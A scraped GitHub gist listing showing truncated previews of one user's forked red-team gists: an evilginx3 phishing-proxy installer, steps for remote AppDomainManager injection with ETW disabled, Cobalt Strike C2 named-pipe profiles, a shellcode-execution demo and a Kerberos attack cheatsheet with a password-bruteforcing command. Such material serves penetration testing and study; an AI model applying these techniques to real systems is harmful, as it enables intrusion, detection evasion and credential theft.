Skip to content

Instantly share code, notes, and snippets.

View bridge-four's full-sized avatar

Jon bridge-four

6 followers · 1 following
View GitHub Profile
@bridge-four
bridge-four / install_evilginx3.sh
Created August 14, 2023 21:16 — forked from dunderhay/install_evilginx3.sh
bash script to install evilginx3 on a ubuntu linux host
#!/bin/bash
set -e
GO_VERSION="1.20.6"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="b945ae2bb5db01a0fb4786afde64e6fbab50b67f6fa0eb6cfa4924f16a7ff1eb"
# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1
@bridge-four
bridge-four / README.md
Created May 10, 2021 04:01 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
@bridge-four
bridge-four / Named Pipes.txt
Last active May 4, 2021 23:28 — forked from MHaggis/malleable_c2_profiles
Malleable C2 / Spawnto / Pipes
bing.profile:68:set pipename "win_svc";
bing.profile:69:set pipename_stager "win_svc";
clean_template.profile:24:set pipename "ntsvcs##";
clean_template.profile:25:set pipename_stager "scerpc##";
clean_template.profile:34:set ssh_pipename "SearchTextHarvester##";
clean_template.profile:363: set pipename "DserNamePipe##";
cobalt.profile:139:## pipename: msagent_##
cobalt.profile:140:## pipename_stager: status_##
cobalt.profile:142:## - Do not use an existing namedpipe, Beacon doesn't check for conflict!
cobalt.profile:145:#set pipename "wkssvc_##";
@bridge-four
bridge-four / forkstats.py
Created September 6, 2020 03:11 — forked from elemongw/forkstats.py
Find most active forks of a project in GitHub. Sorts by most recently pushed
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Collect all forks of a github project and return the most recently pushed.
Any alternatives I could find searched only the most recent forks of a project,
which does not return accurate results for projects with many forks.
Note that the GitHub API has a rate limit of 60 requests per hour for unauthenticated requests.
You can create a personal access token in order to circumvent this, which will raise the limit
@bridge-four
bridge-four / search.cna
Created August 14, 2020 18:48 — forked from rsmudge/search.cna
Search scrollback for a Beacon (even the stuff that's cut off)
# search for and reproduce output that matches a specific regex.
alias search {
local('$regex $regex2 $entry $event $bid $out $when');
# take all of the args, without processing/parsing as normal.
if (strlen($0) > 7) {
$regex = substr($0, 7);
}
else {
berror($1, "search [regex]");
@bridge-four
bridge-four / EtwpTest.cs
Created May 7, 2020 14:17 — forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{
@bridge-four
bridge-four / kerberos_attacks_cheatsheet.md
Last active March 25, 2020 17:03 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: